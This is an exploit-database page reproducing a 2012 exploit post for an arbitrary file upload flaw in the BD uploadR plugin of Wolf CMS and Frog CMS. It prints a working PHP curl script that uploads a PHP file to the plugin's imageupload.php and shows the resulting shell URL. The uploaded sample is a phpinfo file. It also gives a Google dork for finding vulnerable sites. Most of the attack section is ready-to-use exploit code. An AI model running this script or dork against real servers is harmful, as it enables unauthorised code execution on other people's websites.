Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormSammy FORGITPACKETSTORM:114111
HistoryJun 23, 2012 - 12:00 a.m.

Wolf CMS / Frog CMS BD uploadR Shell Upload

2012-06-2300:00:00
Sammy FORGIT
packetstormsecurity.com
19
JSON
`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm Sammy FORGIT member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
##################################################  
# Description : Wolf CMS and Frog CMS Plugins - BD uploadR Arbitrary File Upload Vulnerability  
# Version : no info  
# link : http://www.vanderkleijn.net/frog-cms/plugins/bd-plugins.html  
# Software : http://www.vanderkleijn.net/public/downloads/plugins/bdplugins/BD_uploadR.zip  
# Date : 19-06-2012  
# Google Dork : inurl:/frog/plugins/uploadR or inurl:/wolf/plugins/uploadR  
# Site : 1337day.com Inj3ct0r Exploit Database  
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr  
##################################################  
  
  
Exploit :  
  
<?php  
  
$uploadfile="lo.php";  
  
$ch = curl_init("http://www.exemple.com/frog/plugins/uploadR/imageupload.php?dirname=./uploads");  
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS, array('1'=>"@$uploadfile",  
'id'=>'1'));  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
$postResult = curl_exec($ch);  
curl_close($ch);  
  
print "$postResult";  
  
?>  
  
Shell Access : http://www.exemple.com/frog/plugins/uploadR/uploads/lo.php  
  
lo.php  
<?php  
phpinfo();  
?>  
  
  
# Site : 1337day.com Inj3ct0r Exploit Database  
`
JSON